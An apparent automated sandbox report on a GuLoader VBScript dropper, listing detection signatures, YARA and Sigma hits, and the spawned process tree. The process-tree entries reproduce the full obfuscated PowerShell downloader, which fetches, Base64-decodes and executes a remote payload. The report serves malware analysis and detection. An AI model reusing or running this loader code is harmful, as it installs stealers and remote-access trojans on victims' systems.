
Windows Analysis Report
Blikvarefabrikken.vbs

Overview

General Information

Sample name: Blikvarefabrikken.vbs
Analysis ID: 1658919
MD5: b7d8d9cb6cffa5ae6ecb12d0b1a85b27
SHA1: cbdc3d17f572bec63e07a1a734ae80b4b3f09adb
SHA256: 327a98bd948262a10e37e7d0692c95e30ba41ace15fe01d8e614a9813ad9d5cf
Tags: vbs, user-abuse_ch

Detection

GuLoader
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Classification chart (axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious)
  • System is w10x64
  • wscript.exe (PID: 7084 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 2612 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 6524 cmdline: ping 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
    • powershell.exe (PID: 6560 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ 
Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A gteaSpartl+ Besvr$Ov,rcoB,eboeleHornhiVI terpB infeeNh.miame');Meyers (Emissionskursers ' Polys$ KlinigKomi elSocio OSukkerbUnder AProvinlBrnefl:CaptaniDrilnin p owhTtypewrEUopf.lrJaz.reoCephusrForsorBK.mseniWoolleTta noiAtrsaltLWarsza=Ginnen$CurrisAA bergUInter.tDelighoReflyig Gynkoi TroldrFintfoOBagee .RekurrsPapirkP.rticaltafle.iTra letHov ds(D,mult$Altsaxb Omsl,lFiggieO Afrakk.letteRmedkmpEJejunagbr dgrImyologsDo.sonTAvsharR .erbrePolychRFangsiI LapniNStr,teg StudeEProj krPro.enNKampkueBygnin)');Meyers (Emissionskursers $Xenon);$autogiro=$Interorbital[0];$Optaktens=(Emissionskursers ' Bourr$Torde GForkueLK ereaoMartelbN,misma aalbnl Angli: Mode,ASunburRSta worOx cariGuijosVMultisEBeflowRPlakatiH velln UnescGKejser=determnGearedEGeneraW Udgav-OpsparoNonmagbArnottjPreappe articc yncomTlangtu StavefsBlndeaye.kefrS cupfutPenkeeES agmaMCentri.B burd$ jendoUIndlggNJul,anLNongo aUnbaliBForfodO UmistrSa,demITranceNLandomG');Meyers ($Optaktens);Meyers (Emissionskursers 'T rpen$R kninASh,wpir ecretrFarvebiEsti 
evSpildeeFritstrScuddyiTeutonnInstang.planc.Slu.reHIndstue UstemaR.nteudUrinrre.inuatrNord.es Main [Nongro$BrightGGaase atermi.rHaut.bc Analcoaffe tn ddann7f.rktr2misfat] Baryl=Bademe$ApicalSAntir p aadevlFo,mossPolarieTetrakr');$Railmen=Emissionskursers 'IntertD FeltmoVejskiwsmittenPhonoclSalicioF,rmalaSamoa dGuldinFInspe iKvrknil igfae';$Unweeping=Emissionskursers 'R ngwa$Offs,dAWongatr Sjaskr D,zziito.ingvBill,de allitrS aatriblacksnprocelg Comme.Deworm$Musco RH.rrelaIliopuiOmganglRiotoumCollegeBetragnKapit,.A flueI ta ninMarn,evFoxf,noUn ammkWelcheeSwampi(Middel$OveranaKeystou BougetGa acto Niveag Triumi DsenarInfr loColeus,bebygg$Res.mbHAfmrknyEmbathkApocenlOutbare Beshr)';$Hykle=$Ananasernes;Meyers (Emissionskursers 'Chambe$UncontG fr talCharksOFraterb AlterAOptrapltronst:IlannamUenighUBilledSAltereCNedbraomunifiVGrdetmiNulkom=Palaeo(R glant MarteeSte.ogs BoyarTCo,tem- BroddP mbiseaM,scletPsalmbh B erg Cchadd$Unnatuh Hypo YE tervkRa.ioal AfdelEUf.log)');while (!$Muscovi) {Meyers (Emissionskursers 'Dramat$BankrvgOverfolMavendoTilkenbV katiaSouthilSpl tt:BegyndM nskede gmainrImploro,ienerhKam.maeRevened SundhrK mmana meanil Nytaa=Arb,jd$Scelp BHar,liaAfslaplXantipuBrugerc uperch GalleiG lvantSemiwoh orsvaeGaloperSothooe') ;Meyers $Unweeping;Meyers (Emissionskursers 'Udrigg[Ani latOrcharHFredniRRudderEIndfataRundb dS,ansnII terbNNonin g Ido a.KluddetDeponeh T cksRClo ureInsatiaAirp,oDIdioma]Draebe:horosc:LeveriSRonaldLTach nEdo selEProcomp Qua b( Beamm4Outson0Supped0Brnebi0Betray)');Meyers (Emissionskursers ' ilate$JamanlgWowserLSang loSatyr BVerdena,ursusl ormal:Po.ariMScenogU Lacews ldkogCSupersoJuxtalvIrr taINonenf= Indiv(Pan ulT NrigsE ObjeksS orheT psvul-ProstopFordleaReturntPrepach Confe Ste l$ RymedhMeet nyYikemakOvermilElektrEPanteb)') ;Meyers (Emissionskursers 'Unpack$Ombygng KombilresundO StigebUnciv aLkk.stlOmbe,r:No melU sgsmadLsningLMeroblABwanasAAgnominglibchISnakk nGaardhGBarylee xonicr ericin,osshee 
Karto=,agmem$PatriagSkumsslFloraeoBu,iksBRhinocaM gnoll Fiske: Kvar T vespeeKithlenTandstS Tale,eSublots nstettDillwe+Slaaes+Gul nc%Vel et$Angrebi Re reNDar,hiTTortonE rvler dipoORevereRKonstaBAmerinIBrasbetKindlya OmnitlUnderp. Reinsc Ma,ksORasu.euIgnoren A,klit') ;$autogiro=$Interorbital[$Udlaaningerne]}$Genkendelsesgldes=450598;$Discommodes=31792;Meyers (Emissionskursers 'Dionas$Sc,lptGt,bercLJagt dO Ant cbHovediADi kdrlAureit: ejlfrOForudsuInco.ntGranosrRingtiIlavestvForejueKlevog Falho=Fotomo Mirl GS nipre LadegT Anspn-bandalCAssasso DemilnParatvtSkrupge behagn P.efeTDefunc Buffoa$Valk rhByggefYMintmakAgatysl Krimie');Meyers (Emissionskursers 'Pro on$SponsigSkole,l Un.emoMorosibBronstaBl,torlFalsks:Da friFSidiafrBlem si Tumbrgaptereg Fo sgaIp podsEpitaf Politi=Sancyi Dypnin[Rampe,SK,ststyGavnlisEfterttProbere DarwimAffl x.S ofmnCPri ato amilinpromisvYeardfeSaladirSindsbt Efter]A ambi: Geoto:KirketFtelio.rBrevaaoDonsiemReprepBFornufa F,lcosUndeciePalmes6Hofl.v4Mashy SRavagetSolh trPiedesiCheepsnBesvreg Kdeda(Femini$Ke nerOStigb.uRigsantN nocurAnomali Emir vAfspejeDyrtid)');Meyers (Emissionskursers 'A skil$ ResurgDupliclU,selhoInstrub CurreaGnomolLMicroc:Al erdH naverATrolloiImpastREternap .eminiIndbeteNonconc Supp E PolixsHensid Immor,=C,asse Ove de[ Colums BoardySi,hons Oral T aanenEAfvrgemI,iaut. b,rdeTAffricEweekenXPulserTPantei. 
MiscoEGrundlN Hjr,sCblack,oGr sesdOverspi BenzoNPedestG Lek r]E sfar:Skrald:SociosaUnbundSUntremcTurtosITribulIAstipu.bohe sGAsked EOptageTSapr.zsEkstraTBe tiaRMidbaniOverdenGreendGCruisi(Marent$FrerhuFFusionRJoylesiRa.erkg SmrokGKursusA NordasB.ndol)');Meyers (Emissionskursers 'homolo$Skrto gVacuoll BandeoLie erBDeglamAUv alrlCrossk:A tianEMet olMInsu tETroll nUd oerdi,expaAMeloidtF.sobaiCrouchODi.socnBacktrEUd indrVerveln Re.dieT.nkel=Knogle$ K,ntrH Gad daKulakiI.rander SociapFred.iIAllerveR.msteCLast iEmasochsColour.Stansnspolydiu ColorBSanin,sgrayliTSpoonbR,aseloiKyakgyNOverlegYe ked(Aktivi$waff,egEpicurE SlubbNIntetkKBat.ysEInter,NKnivstDLiturgETodageLMetwanS vedeePju,kpsOverprGKvastblCrossrd UnambEOverp SC,ncel,Highla$TokenlDTortoiIHypomasBhutlaCHe ophOPrivatmMediatMGgemadOTaljebD AfslrEBlaekcs Overt)');Meyers $Emendationerne;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6456 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ 
Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A gteaSpartl+ Besvr$Ov,rcoB,eboeleHornhiVI terpB infeeNh.miame');Meyers (Emissionskursers ' Polys$ KlinigKomi elSocio OSukkerbUnder AProvinlBrnefl:CaptaniDrilnin p owhTtypewrEUopf.lrJaz.reoCephusrForsorBK.mseniWoolleTta noiAtrsaltLWarsza=Ginnen$CurrisAA bergUInter.tDelighoReflyig Gynkoi TroldrFintfoOBagee .RekurrsPapirkP.rticaltafle.iTra letHov ds(D,mult$Altsaxb Omsl,lFiggieO Afrakk.letteRmedkmpEJejunagbr dgrImyologsDo.sonTAvsharR .erbrePolychRFangsiI LapniNStr,teg StudeEProj krPro.enNKampkueBygnin)');Meyers (Emissionskursers $Xenon);$autogiro=$Interorbital[0];$Optaktens=(Emissionskursers ' Bourr$Torde GForkueLK ereaoMartelbN,misma aalbnl Angli: Mode,ASunburRSta worOx cariGuijosVMultisEBeflowRPlakatiH velln UnescGKejser=determnGearedEGeneraW Udgav-OpsparoNonmagbArnottjPreappe articc yncomTlangtu StavefsBlndeaye.kefrS cupfutPenkeeES agmaMCentri.B burd$ jendoUIndlggNJul,anLNongo aUnbaliBForfodO UmistrSa,demITranceNLandomG');Meyers ($Optaktens);Meyers (Emissionskursers 'T rpen$R kninASh,wpir ecretrFarvebiEsti 
evSpildeeFritstrScuddyiTeutonnInstang.planc.Slu.reHIndstue UstemaR.nteudUrinrre.inuatrNord.es Main [Nongro$BrightGGaase atermi.rHaut.bc Analcoaffe tn ddann7f.rktr2misfat] Baryl=Bademe$ApicalSAntir p aadevlFo,mossPolarieTetrakr');$Railmen=Emissionskursers 'IntertD FeltmoVejskiwsmittenPhonoclSalicioF,rmalaSamoa dGuldinFInspe iKvrknil igfae';$Unweeping=Emissionskursers 'R ngwa$Offs,dAWongatr Sjaskr D,zziito.ingvBill,de allitrS aatriblacksnprocelg Comme.Deworm$Musco RH.rrelaIliopuiOmganglRiotoumCollegeBetragnKapit,.A flueI ta ninMarn,evFoxf,noUn ammkWelcheeSwampi(Middel$OveranaKeystou BougetGa acto Niveag Triumi DsenarInfr loColeus,bebygg$Res.mbHAfmrknyEmbathkApocenlOutbare Beshr)';$Hykle=$Ananasernes;Meyers (Emissionskursers 'Chambe$UncontG fr talCharksOFraterb AlterAOptrapltronst:IlannamUenighUBilledSAltereCNedbraomunifiVGrdetmiNulkom=Palaeo(R glant MarteeSte.ogs BoyarTCo,tem- BroddP mbiseaM,scletPsalmbh B erg Cchadd$Unnatuh Hypo YE tervkRa.ioal AfdelEUf.log)');while (!$Muscovi) {Meyers (Emissionskursers 'Dramat$BankrvgOverfolMavendoTilkenbV katiaSouthilSpl tt:BegyndM nskede gmainrImploro,ienerhKam.maeRevened SundhrK mmana meanil Nytaa=Arb,jd$Scelp BHar,liaAfslaplXantipuBrugerc uperch GalleiG lvantSemiwoh orsvaeGaloperSothooe') ;Meyers $Unweeping;Meyers (Emissionskursers 'Udrigg[Ani latOrcharHFredniRRudderEIndfataRundb dS,ansnII terbNNonin g Ido a.KluddetDeponeh T cksRClo ureInsatiaAirp,oDIdioma]Draebe:horosc:LeveriSRonaldLTach nEdo selEProcomp Qua b( Beamm4Outson0Supped0Brnebi0Betray)');Meyers (Emissionskursers ' ilate$JamanlgWowserLSang loSatyr BVerdena,ursusl ormal:Po.ariMScenogU Lacews ldkogCSupersoJuxtalvIrr taINonenf= Indiv(Pan ulT NrigsE ObjeksS orheT psvul-ProstopFordleaReturntPrepach Confe Ste l$ RymedhMeet nyYikemakOvermilElektrEPanteb)') ;Meyers (Emissionskursers 'Unpack$Ombygng KombilresundO StigebUnciv aLkk.stlOmbe,r:No melU sgsmadLsningLMeroblABwanasAAgnominglibchISnakk nGaardhGBarylee xonicr ericin,osshee 
Karto=,agmem$PatriagSkumsslFloraeoBu,iksBRhinocaM gnoll Fiske: Kvar T vespeeKithlenTandstS Tale,eSublots nstettDillwe+Slaaes+Gul nc%Vel et$Angrebi Re reNDar,hiTTortonE rvler dipoORevereRKonstaBAmerinIBrasbetKindlya OmnitlUnderp. Reinsc Ma,ksORasu.euIgnoren A,klit') ;$autogiro=$Interorbital[$Udlaaningerne]}$Genkendelsesgldes=450598;$Discommodes=31792;Meyers (Emissionskursers 'Dionas$Sc,lptGt,bercLJagt dO Ant cbHovediADi kdrlAureit: ejlfrOForudsuInco.ntGranosrRingtiIlavestvForejueKlevog Falho=Fotomo Mirl GS nipre LadegT Anspn-bandalCAssasso DemilnParatvtSkrupge behagn P.efeTDefunc Buffoa$Valk rhByggefYMintmakAgatysl Krimie');Meyers (Emissionskursers 'Pro on$SponsigSkole,l Un.emoMorosibBronstaBl,torlFalsks:Da friFSidiafrBlem si Tumbrgaptereg Fo sgaIp podsEpitaf Politi=Sancyi Dypnin[Rampe,SK,ststyGavnlisEfterttProbere DarwimAffl x.S ofmnCPri ato amilinpromisvYeardfeSaladirSindsbt Efter]A ambi: Geoto:KirketFtelio.rBrevaaoDonsiemReprepBFornufa F,lcosUndeciePalmes6Hofl.v4Mashy SRavagetSolh trPiedesiCheepsnBesvreg Kdeda(Femini$Ke nerOStigb.uRigsantN nocurAnomali Emir vAfspejeDyrtid)');Meyers (Emissionskursers 'A skil$ ResurgDupliclU,selhoInstrub CurreaGnomolLMicroc:Al erdH naverATrolloiImpastREternap .eminiIndbeteNonconc Supp E PolixsHensid Immor,=C,asse Ove de[ Colums BoardySi,hons Oral T aanenEAfvrgemI,iaut. b,rdeTAffricEweekenXPulserTPantei. 
MiscoEGrundlN Hjr,sCblack,oGr sesdOverspi BenzoNPedestG Lek r]E sfar:Skrald:SociosaUnbundSUntremcTurtosITribulIAstipu.bohe sGAsked EOptageTSapr.zsEkstraTBe tiaRMidbaniOverdenGreendGCruisi(Marent$FrerhuFFusionRJoylesiRa.erkg SmrokGKursusA NordasB.ndol)');Meyers (Emissionskursers 'homolo$Skrto gVacuoll BandeoLie erBDeglamAUv alrlCrossk:A tianEMet olMInsu tETroll nUd oerdi,expaAMeloidtF.sobaiCrouchODi.socnBacktrEUd indrVerveln Re.dieT.nkel=Knogle$ K,ntrH Gad daKulakiI.rander SociapFred.iIAllerveR.msteCLast iEmasochsColour.Stansnspolydiu ColorBSanin,sgrayliTSpoonbR,aseloiKyakgyNOverlegYe ked(Aktivi$waff,egEpicurE SlubbNIntetkKBat.ysEInter,NKnivstDLiturgETodageLMetwanS vedeePju,kpsOverprGKvastblCrossrd UnambEOverp SC,ncel,Highla$TokenlDTortoiIHypomasBhutlaCHe ophOPrivatmMediatMGgemadOTaljebD AfslrEBlaekcs Overt)');Meyers $Emendationerne;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 836 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 6436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
      Source: 00000007.00000002.2119893236.00000000092E7000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
      Source: 00000012.00000002.2336376984.0000000004897000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
      Source: Process Memory Space: powershell.exe PID: 6560, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
      • 0x574a0:$b2: ::FromBase64String(
      • 0x10f5f6:$b2: ::FromBase64String(
      • 0x10f62d:$b2: ::FromBase64String(
      • 0x10f665:$b2: ::FromBase64String(
      • 0x10f69e:$b2: ::FromBase64String(
      • 0x10f6d8:$b2: ::FromBase64String(
      • 0x10f713:$b2: ::FromBase64String(
      • 0x10f74f:$b2: ::FromBase64String(
      • 0x10f78c:$b2: ::FromBase64String(
      • 0x10f7ca:$b2: ::FromBase64String(
      • 0x10f809:$b2: ::FromBase64String(
      • 0x7a9a5:$s1: -join
      • 0x87a7a:$s1: -join
      • 0x8ae4c:$s1: -join
      • 0x8b4fe:$s1: -join
      • 0x8cfef:$s1: -join
      • 0x8f1f5:$s1: -join
      • 0x8fa1c:$s1: -join
      • 0x9028c:$s1: -join
      • 0x909c7:$s1: -join
      • 0x909f9:$s1: -join
      Source: Process Memory Space: powershell.exe PID: 6456, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
      • 0x2a011:$b2: ::FromBase64String(
      • 0x25471:$s1: -join
      • 0x117ef0:$s1: -join
      • 0x11f860:$s1: -join
      • 0x1a0b33:$s1: -join
      • 0x1adc08:$s1: -join
      • 0x1b0fda:$s1: -join
      • 0x1b168c:$s1: -join
      • 0x1b317d:$s1: -join
      • 0x1b5383:$s1: -join
      • 0x1b5baa:$s1: -join
      • 0x1b641a:$s1: -join
      • 0x1b6b55:$s1: -join
      • 0x1b6b87:$s1: -join
      • 0x1b6bcf:$s1: -join
      • 0x1b6bee:$s1: -join
      • 0x1b743e:$s1: -join
      • 0x1b75ba:$s1: -join
      • 0x1b7632:$s1: -join
      • 0x1b76c5:$s1: -join
      • 0x1b792b:$s1: -join
      Source: amsi32_6456.amsi.csv, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
      • 0xd2a6:$b2: ::FromBase64String(
      • 0xcce8:$s1: -join
      • 0x6494:$s4: +=
      • 0x6556:$s4: +=
      • 0xa77d:$s4: +=
      • 0xc89a:$s4: +=
      • 0xcb84:$s4: +=
      • 0xccca:$s4: +=
      • 0x168b9:$s4: +=
      • 0x16939:$s4: +=
      • 0x169ff:$s4: +=
      • 0x16a7f:$s4: +=
      • 0x16c55:$s4: +=
      • 0x16cd9:$s4: +=
      • 0x3f0a:$e4: Get-WmiObject
      • 0x40f9:$e4: Get-Process
      • 0x4151:$e4: Start-Process
      • 0x17545:$e4: Get-Process

      System Summary

      Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4040, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs", ProcessId: 7084, ProcessName: wscript.exe
      Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4040, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs", ProcessId: 7084, ProcessName: wscript.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 